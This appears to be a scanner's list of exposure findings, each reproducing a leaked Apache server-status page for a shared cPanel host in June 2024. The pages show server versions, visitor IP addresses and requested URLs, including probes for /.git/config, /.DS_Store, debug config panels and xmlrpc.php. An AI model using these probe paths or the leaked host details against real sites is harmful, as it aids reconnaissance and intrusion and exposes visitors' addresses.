      172.70.203.146http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-955050/500/7921_
      41.77194171642000.017.881098.89
      172.71.210.139http/1.1adyar.com.sa:80GET /wp-includes/js/jcrop/ HTTP/1.1
      
      0-955050/252/7329_
      42.061155809720.087.791327.82
      172.69.130.82http/1.1nidaa.ws:80GET /_all_dbs HTTP/1.1
      
      0-955050/286/7549_
      41.24430598476480.0118.421373.56
      95.185.120.243http/1.1alezdhar.com:443GET /build/assets/Azer.1a3e1c7b.ttf HTTP/1.1
      
      0-955050/354/7629_
      41.22432158361610.088.601298.06
      5.82.59.233http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-955050/279/8278_
      42.0457260523070.092.171325.02
      51.36.103.159http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-955050/429/7881_
      41.9192158714890.071.611295.54
      172.71.210.139http/1.1adyar.com.sa:80GET /attachments/category/ HTTP/1.1
      
      0-955050/343/7732_
      41.17550347252818930.025.76916.35
      103.166.59.116http/1.1unilever.thenewjeddah.com:443GET /js/bootstrap.bundle.min.js HTTP/1.1
      
      0-955050/402/8226_
      41.1951012556694600.064.58896.12
      103.15.42.200http/1.1ucc.thenewjeddah.com:443GET /admin HTTP/1.1
      
      0-955050/434/7803_
      40.985751157480510.079.741502.78
      168.76.20.229http/1.1
      
      0-955050/300/7609_
      41.48298206058919430.066.121277.49
      66.249.64.46http/1.1albayan.edu.sa:443GET /imgweb/cur1439/2/scist2.pdf HTTP/1.1
      
      0-955050/280/7506_
      41.60239298068350.042.67963.68
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-955050/371/7492_
      41.27348239638620.088.811061.68
      95.187.98.110http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/controls_bg.png HT
      
      0-955050/280/7606_
      41.79169149103340.067.601294.80
      144.202.21.220http/1.1randalift.com.sa:80HEAD /home HTTP/1.1
      
      0-955050/387/7914_
      41.204843695676310.089.501421.50
      54.36.148.17http/1.1albayan.edu.sa:443GET /web/21.html2 HTTP/1.1
      
      0-955050/413/7780_
      41.15598154389910.0165.391371.27
      66.249.64.45http/1.1albayan.edu.sa:443GET /imgweb/1445/%C3%98%C2%A8%C3%99%E2%80%A0%C3%99%C6%92%20%C3%
      
      0-955050/309/7925_
      42.0371159016680.031.021230.42
      172.71.210.139http/1.1adyar.com.sa:80GET /administrator/ HTTP/1.1
      
      0-955050/338/7373_
      40.1358327205215360620.024.251030.56
      5.246.32.89http/1.1
      
      0-955050/363/7718_
      42.063521064355650.038.261194.49
      93.169.133.217http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-955050/387/7625_
      41.244138855065320.050.431286.62
      54.36.148.108http/1.1albayan.edu.sa:443GET /web/43.html HTTP/1.1
      
      0-955050/322/7804_
      41.17516247007420.021.491294.22
      172.70.179.123http/1.1php.we3dvi.com:80GET / HTTP/1.1
      
      0-955051/280/7759K
      42.2732070552636645260.2109.601436.88
      66.249.64.46http/1.1albayan.edu.sa:443GET /imgweb/cur1439/2/scist2.pdf HTTP/1.1
      
      1-960110/333/6975_
      42.88474631378527090.052.011405.41
      103.166.59.116http/1.1unilever.thenewjeddah.com:443GET /storage/media/image/d9zkWnLepLrfQNHGZIHKFXCVkBLvDLbOKYMrd6
      
      1-960110/538/7570_
      42.992482170220860.020.601382.23
      54.36.148.97http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1657 HTTP/1.1
      
      1-960110/330/7675_
      42.38583264506090.0118.711345.72
      5.246.32.89http/1.1
      
      1-960110/347/7565_
      42.85502518102764890.023.40964.03
      103.15.42.200http/1.1ucc.thenewjeddah.com:443GET /js/jquery-ui.js HTTP/1.1
      
      1-960110/335/7070_
      43.021176865529490.073.941198.79
      54.36.148.84http/1.1albayan.edu.sa:443GET /web/129.html2 HTTP/1.1
      
      1-960110/245/7415_
      43.057310460726550.012.201080.32
      217.76.155.236http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-960110/312/7391_
      42.23436475392413230.0110.211246.61
      72.14.201.95http/1.1
      
      1-960110/277/7396_
      43.061152203800.033.65912.19
      172.69.130.28http/1.1nidaa.ws:80GET /.DS_Store HTTP/1.1
      
      1-960110/445/6886_
      42.93
      Found on 2024-06-04 09:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314091e07280

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 12:50:47 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 8 hours 45 minutes 57 seconds
      Server load: 0.47 0.41 0.42
      Total accesses: 1739021 - Total Traffic: 266.3 GB - Total Duration: 1990216137
      CPU Usage: u741.78 s74.94 cu7463.93 cs1706.22 - .935% CPU load
      1.63 requests/sec - 261.4 kB/second - 160.6 kB/request - 1144.45 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      _____K__________________________K________________________K______
      _____________________W__K___________C________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW__K_______________________________________
      _______K___________K___________K__________________________......
      ...................______________________K__....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-955050/434/8413_
      41.2049469366904640.063.781115.35
      103.15.42.200http/1.1ucc.thenewjeddah.com:443GET /build/assets/app-0707c470.js HTTP/1.1
      
      0-955050/323/7332_
      41.25352337081280.068.831190.36
      93.158.91.31http/1.1hawsab.me:443GET / HTTP/1.1
      
      0-955050/341/7545_
      41.61229137996200.017.80975.71
      172.68.225.105http/1.1adyar.com.sa:80GET /wp-content/dropdown.php HTTP/1.1
      
      0-955050/371/7646_
      41.2539114372119560.084.211120.60
      172.70.203.146http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-955050/500/7921_
      41.77187171642000.017.881098.89
      172.71.210.139http/1.1adyar.com.sa:80GET /wp-includes/js/jcrop/ HTTP/1.1
      
      0-955051/251/7328K
      42.061155809680.887.791327.82
      172.69.130.82http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-955050/286/7549_
      41.24423598476480.0118.421373.56
      95.185.120.243http/1.1alezdhar.com:443GET /build/assets/Azer.1a3e1c7b.ttf HTTP/1.1
      
      0-955050/354/7629_
      41.22425158361610.088.601298.06
      5.82.59.233http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-955050/279/8278_
      42.0450260523070.092.171325.02
      51.36.103.159http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-955050/429/7881_
      41.9185158714890.071.611295.54
      172.71.210.139http/1.1adyar.com.sa:80GET /attachments/category/ HTTP/1.1
      
      0-955050/343/7732_
      41.17543347252818930.025.76916.35
      103.166.59.116http/1.1unilever.thenewjeddah.com:443GET /js/bootstrap.bundle.min.js HTTP/1.1
      
      0-955050/402/8226_
      41.1950312556694600.064.58896.12
      103.15.42.200http/1.1ucc.thenewjeddah.com:443GET /admin HTTP/1.1
      
      0-955050/434/7803_
      40.985681157480510.079.741502.78
      168.76.20.229http/1.1
      
      0-955050/300/7609_
      41.48291206058919430.066.121277.49
      66.249.64.46http/1.1albayan.edu.sa:443GET /imgweb/cur1439/2/scist2.pdf HTTP/1.1
      
      0-955050/280/7506_
      41.60232298068350.042.67963.68
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-955050/371/7492_
      41.27341239638620.088.811061.68
      95.187.98.110http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/controls_bg.png HT
      
      0-955050/280/7606_
      41.79162149103340.067.601294.80
      144.202.21.220http/1.1randalift.com.sa:80HEAD /home HTTP/1.1
      
      0-955050/387/7914_
      41.204773695676310.089.501421.50
      54.36.148.17http/1.1albayan.edu.sa:443GET /web/21.html2 HTTP/1.1
      
      0-955050/413/7780_
      41.15591154389910.0165.391371.27
      66.249.64.45http/1.1albayan.edu.sa:443GET /imgweb/1445/%C3%98%C2%A8%C3%99%E2%80%A0%C3%99%C6%92%20%C3%
      
      0-955050/309/7925_
      42.0364159016680.031.021230.42
      172.71.210.139http/1.1adyar.com.sa:80GET /administrator/ HTTP/1.1
      
      0-955050/338/7373_
      40.1357627205215360620.024.251030.56
      5.246.32.89http/1.1
      
      0-955050/363/7718_
      42.062821064355650.038.261194.49
      93.169.133.217http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-955050/387/7625_
      41.244068855065320.050.431286.62
      54.36.148.108http/1.1albayan.edu.sa:443GET /web/43.html HTTP/1.1
      
      0-955050/322/7804_
      41.17509247007420.021.491294.22
      172.70.179.123http/1.1php.we3dvi.com:80GET / HTTP/1.1
      
      0-955050/279/7758_
      41.15602155222250.065.401392.68
      193.34.73.13http/1.1hawsab.me:443GET / HTTP/1.1
      
      1-960110/333/6975_
      42.88467631378527090.052.011405.41
      103.166.59.116http/1.1unilever.thenewjeddah.com:443GET /storage/media/image/d9zkWnLepLrfQNHGZIHKFXCVkBLvDLbOKYMrd6
      
      1-960110/538/7570_
      42.992412170220860.020.601382.23
      54.36.148.97http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1657 HTTP/1.1
      
      1-960110/330/7675_
      42.38576264506090.0118.711345.72
      5.246.32.89http/1.1
      
      1-960110/347/7565_
      42.85495518102764890.023.40964.03
      103.15.42.200http/1.1ucc.thenewjeddah.com:443GET /js/jquery-ui.js HTTP/1.1
      
      1-960110/335/7070_
      43.021106865529490.073.941198.79
      54.36.148.84http/1.1albayan.edu.sa:443GET /web/129.html2 HTTP/1.1
      
      1-960110/245/7415_
      43.056610460726550.012.201080.32
      217.76.155.236http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-960110/312/7391_
      42.23429475392413230.0110.211246.61
      72.14.201.95http/1.1
      
      1-960111/276/7395K
      43.0632522037766.633.65912.19
      172.69.130.28http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-960110/445/6886_
      42.9340516919575096
      Found on 2024-06-04 09:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831404b126238

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 14:50:06 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 10 hours 45 minutes 16 seconds
      Server load: 0.80 0.49 0.43
      Total accesses: 1442169 - Total Traffic: 206.3 GB - Total Duration: 1573004000
      CPU Usage: u543.32 s42.97 cu6266.6 cs1387.28 - .913% CPU load
      1.6 requests/sec - 239.7 kB/second - 150.0 kB/request - 1090.72 ms/request
      38 requests currently being processed, 0 workers gracefully restarting, 212 idle workers
      ___K____R___K______________K_K__________________K___K_______CWKK
      ______R_______K______K__K__K_________K___K____________KR_____WWW
      WWWWWWWWWWWWWWWWWWWWWW__R_________________W___K_______W__R_R____
      _K_K____..................................................______
      ____K_______R__K___________K___K_________K___K_K_K______________
      K____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8128400/190/7049_
      26.4893552393420.020.25915.52
      51.36.197.245http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/xhNnEQ3ybhAhLXkqhQqJWL
      
      0-8128400/196/6067_
      26.6214124900240.021.49912.93
      4.227.80.219http/1.1abu-helal.com:80GET /js/html5shiv-master/src/html5shiv.js HTTP/1.1
      
      0-8128400/247/6317_
      26.654329443580.051.26844.83
      66.249.64.8http/1.1hawsab.me:80GET /?xka7432zohwdor532.html HTTP/1.1
      
      0-8128401/175/6246K
      26.6601363523410.831.49861.99
      162.158.111.86http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-8128400/223/6441_
      26.639361401730.06.37941.62
      175.110.187.124http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/controls_bg.png HT
      
      0-8128400/214/6075_
      26.655148218190.09.241049.53
      4.227.80.219http/1.1abu-helal.com:80GET /static/js/chunk-vendors.9a404d7b.js HTTP/1.1
      
      0-8128400/163/6275_
      26.536029347809980.0100.05933.03
      50.60.28.67http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________1_11.png HT
      
      0-8128400/268/6254_
      26.660144329700.093.871011.48
      4.227.80.219http/1.1abu-helal.com:80GET /assets/webpack/commons-pages.groups.sso-pages.registration
      
      0-8128400/201/6928R
      26.0225391950091280.09.271053.69
      95.187.124.20http/1.1
      
      0-8128400/286/6259_
      26.651147308590.013.931010.92
      51.36.197.245http/1.1jawad.com.sa:443GET /public/front_resources/css/jquery_rating.css HTTP/1.1
      
      0-8128400/225/6325_
      26.6540239166290.020.23754.46
      4.227.80.219http/1.1abu-helal.com:80GET /static/js/chunk-vendors.1199c7b3.js HTTP/1.1
      
      0-8128400/141/6907_
      26.54528846543850.012.74672.88
      162.158.59.153http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8128401/180/6367K
      26.660148192170.85.591182.55
      172.70.250.141http/1.1nidaa.ws:80GET /.DS_Store HTTP/1.1
      
      0-8128400/178/6173_
      26.497061447996120.049.511076.93
      51.253.149.112http/1.1albayan.edu.sa:443GET /imgweb/1445/5th%20Grammar%20QB%20-%20Term%203%20-%20(2023-
      
      0-8128401/200/6443K
      26.670281048720.88.36782.77
      172.70.251.81http/1.1nidaa.ws:80GET /telescope/requests HTTP/1.1
      
      0-8128400/187/6208_
      26.634118930566730.013.38863.80
      2.90.126.61http/1.1albayan.edu.sa:443GET /imgweb/qb39/5/mat25.pdf HTTP/1.1
      
      0-8128400/174/6228_
      26.6497035980820.023.251016.54
      5.111.63.35http/1.1albayan.edu.sa:443GET /web/396.html2 HTTP/1.1
      
      0-8128400/258/6351_
      26.662174518580.058.871010.19
      4.227.80.219http/1.1abu-helal.com:80GET /static/js/6.2cdf7034.chunk.js HTTP/1.1
      
      0-8128400/166/6462_
      26.5915441771900.068.471027.19
      5.111.63.35http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-8128400/242/6552_
      26.5270547095220.045.06934.02
      51.36.197.245http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tykLfFhCD2jN2pejQcaVTB
      
      0-8128400/212/6184_
      26.54420205652220.08.21788.66
      114.119.139.123http/1.13dvi.com:80GET /images/folio/thumbs/137769510969519.jpg HTTP/1.1
      
      0-8128400/187/6371_
      26.5452146174510.059.791035.05
      50.60.28.67http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B5%D9%88%D8%B1%D8%A9%20%D9%88%D8%A7%D8%AA%
      
      0-8128400/215/6258_
      26.4982049859390.09.601111.09
      52.167.144.166http/1.1albayan.edu.sa:80GET /web/32.html2 HTTP/1.1
      
      0-8128400/220/6527_
      26.54397535902520.0254.54985.52
      162.158.59.155http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8128400/174/6470_
      26.552710241284740.028.041094.62
      162.158.59.156http/1.1sibaqulhorof.com:443POST /api/v1/app/game/start HTTP/1.1
      
      1-8103360/26/5677_
      5.6238268245430.01.871102.62
      162.142.125.205http/1.1php.we3dvi.com:80PRI * HTTP/2.0
      
      1-8103360/43/6033_
      5.623711958199140.00.941074.97
      162.158.59.157http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      1-8103361/40/6367K
      5.690145884160.82.331065.61
      172.70.251.6http/1.1nidaa.ws:80GET /.git/config HTTP/1.1
      
      1-8103360/34/6288_
      5.5949287962140.02.85797.48
      176.224.93.162http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/buttons.png HTTP/1
      
      1-8103361/28/5903K
      5.6836495627477338.821.94962.82
      51.39.75.122http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A3%D8%B3%D8%A6%D9%8
      
      1-8103360/25/6194_
      5.642424955569750.00.53875.18
      51.36.197.245http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/ysV1nZubuRzFwo44rZjN0P
      
      1-8103360/35/6151_
      5.47916772417600.04.811003.92
      93.169.154.97http/1.1albayan.edu.sa:443</
      Found on 2024-06-02 11:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140f99675d3

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 14:50:06 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 10 hours 45 minutes 16 seconds
      Server load: 0.80 0.49 0.43
      Total accesses: 1442153 - Total Traffic: 206.3 GB - Total Duration: 1573003864
      CPU Usage: u543.25 s42.97 cu6266.6 cs1387.28 - .913% CPU load
      1.6 requests/sec - 239.7 kB/second - 150.0 kB/request - 1090.73 ms/request
      31 requests currently being processed, 0 workers gracefully restarting, 219 idle workers
      ___K____R____________________K_______________KK_____________C_KK
      ______R______________K__K__W__________________________KR_____WWW
      WWWWWWWWWWWWWWWWWWWWWW________K___________W___K_______W__R_R____
      _K______..................................................__K___
      ____K___C______K___________K___K________K______K_K__________K___
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8128400/190/7049_
      26.4893552393420.020.25915.52
      51.36.197.245http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/xhNnEQ3ybhAhLXkqhQqJWL
      
      0-8128400/196/6067_
      26.6214124900240.021.49912.93
      4.227.80.219http/1.1abu-helal.com:80GET /js/html5shiv-master/src/html5shiv.js HTTP/1.1
      
      0-8128400/247/6317_
      26.654329443580.051.26844.83
      66.249.64.8http/1.1hawsab.me:80GET /?xka7432zohwdor532.html HTTP/1.1
      
      0-8128401/175/6246K
      26.6601363523410.831.49861.99
      162.158.111.86http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-8128400/223/6441_
      26.639361401730.06.37941.62
      175.110.187.124http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/controls_bg.png HT
      
      0-8128400/214/6075_
      26.655148218190.09.241049.53
      4.227.80.219http/1.1abu-helal.com:80GET /static/js/chunk-vendors.9a404d7b.js HTTP/1.1
      
      0-8128400/163/6275_
      26.535929347809980.0100.05933.03
      50.60.28.67http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________1_11.png HT
      
      0-8128400/268/6254_
      26.660144329700.093.871011.48
      4.227.80.219http/1.1abu-helal.com:80GET /assets/webpack/commons-pages.groups.sso-pages.registration
      
      0-8128400/201/6928R
      26.0225291950091280.09.271053.69
      95.187.124.20http/1.1
      
      0-8128400/286/6259_
      26.651147308590.013.931010.92
      51.36.197.245http/1.1jawad.com.sa:443GET /public/front_resources/css/jquery_rating.css HTTP/1.1
      
      0-8128400/225/6325_
      26.6540239166290.020.23754.46
      4.227.80.219http/1.1abu-helal.com:80GET /static/js/chunk-vendors.1199c7b3.js HTTP/1.1
      
      0-8128400/141/6907_
      26.54528846543850.012.74672.88
      162.158.59.153http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8128400/179/6366_
      26.44112048192140.05.591182.55
      52.167.144.166http/1.1albayan.edu.sa:80GET /imgweb/9th%20Term%201%20Final%20QB%2022-23.pdf HTTP/1.1
      
      0-8128400/178/6173_
      26.497061447996120.049.511076.93
      51.253.149.112http/1.1albayan.edu.sa:443GET /imgweb/1445/5th%20Grammar%20QB%20-%20Term%203%20-%20(2023-
      
      0-8128400/199/6442_
      26.19100081048680.08.36782.77
      37.42.155.224http/1.1
      
      0-8128400/187/6208_
      26.634118930566730.013.38863.80
      2.90.126.61http/1.1albayan.edu.sa:443GET /imgweb/qb39/5/mat25.pdf HTTP/1.1
      
      0-8128400/174/6228_
      26.6487035980820.023.251016.54
      5.111.63.35http/1.1albayan.edu.sa:443GET /web/396.html2 HTTP/1.1
      
      0-8128400/258/6351_
      26.662174518580.058.871010.19
      4.227.80.219http/1.1abu-helal.com:80GET /static/js/6.2cdf7034.chunk.js HTTP/1.1
      
      0-8128400/166/6462_
      26.5915441771900.068.471027.19
      5.111.63.35http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-8128400/242/6552_
      26.5270547095220.045.06934.02
      51.36.197.245http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tykLfFhCD2jN2pejQcaVTB
      
      0-8128400/212/6184_
      26.54410205652220.08.21788.66
      114.119.139.123http/1.13dvi.com:80GET /images/folio/thumbs/137769510969519.jpg HTTP/1.1
      
      0-8128400/187/6371_
      26.5452146174510.059.791035.05
      50.60.28.67http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B5%D9%88%D8%B1%D8%A9%20%D9%88%D8%A7%D8%AA%
      
      0-8128400/215/6258_
      26.4982049859390.09.601111.09
      52.167.144.166http/1.1albayan.edu.sa:80GET /web/32.html2 HTTP/1.1
      
      0-8128400/220/6527_
      26.54397535902520.0254.54985.52
      162.158.59.155http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8128400/174/6470_
      26.552610241284740.028.041094.62
      162.158.59.156http/1.1sibaqulhorof.com:443POST /api/v1/app/game/start HTTP/1.1
      
      1-8103360/26/5677_
      5.6238268245430.01.871102.62
      162.142.125.205http/1.1php.we3dvi.com:80PRI * HTTP/2.0
      
      1-8103360/43/6033_
      5.623611958199140.00.941074.97
      162.158.59.157http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      1-8103360/39/6366_
      5.46102245884120.02.321065.61
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      1-8103360/34/6288_
      5.5949287962140.02.85797.48
      176.224.93.162http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/buttons.png HTTP/1
      
      1-8103361/28/5903K
      5.6826495627477338.821.94962.82
      51.39.75.122http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A3%D8%B3%D8%A6%D9%8
      
      1-8103360/25/6194_
      5.642424955569750.00.53875.18
      51.36.197.245http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/ysV1nZubuRzFwo44rZjN0P
      
      1-8103360/35/6151_
      5.47916772417600.04.811003.92
      93.169.154.97http/1.1albayan.edu.sa:443GE
      Found on 2024-06-02 11:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140e788c48e

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 01-Jun-2024 14:53:24 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 10 hours 48 minutes 34 seconds
      Server load: 0.45 0.42 0.42
      Total accesses: 1270180 - Total Traffic: 181.8 GB - Total Duration: 1402282855
      CPU Usage: u533.86 s44.72 cu5497.83 cs1237.95 - .896% CPU load
      1.56 requests/sec - 233.5 kB/second - 150.1 kB/request - 1104 ms/request
      31 requests currently being processed, 0 workers gracefully restarting, 194 idle workers
      __K______RK___W____R__W_W_____________________K__________W_____K
      ____K_________WR__________K_______K__K__R_____________W_W_R__WWW
      WWWWWWWWWWWWWWWWWWWWWW___K____________K__W________R_W________K__
      ________________W________KK________________R______K_______......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
